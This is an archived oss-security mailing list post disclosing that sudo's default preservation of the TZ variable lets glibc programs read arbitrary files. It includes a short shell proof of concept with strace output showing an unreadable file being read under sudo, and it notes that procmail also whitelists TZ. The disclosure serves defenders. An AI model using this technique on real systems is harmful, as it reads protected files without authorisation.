Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 16 Oct 2014 00:35:32 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Abusing TZ for fun (and little profit)

By default, sudo preserves the TZ variable[1] from user's environment. 
This is a bad idea on glibc systems, where TZ can be abused to trick the 
program to read an arbitrary file. PoC:

$ echo moo > tz
$ chmod 0 tz
$ cat tz
cat: tz: Permission denied
$ TZ=$PWD/tz sudo -u root strace -e read date
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512
read(3, "moo\n", 4096)                  = 4
read(3, "", 4096)                       = 0
Wed Oct 15 20:42:42  2014
+++ exited with 0 +++


Procmail is another program that recklessly whitelists TZ[2].


[1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
[2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13

-- 
Jakub Wilk

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ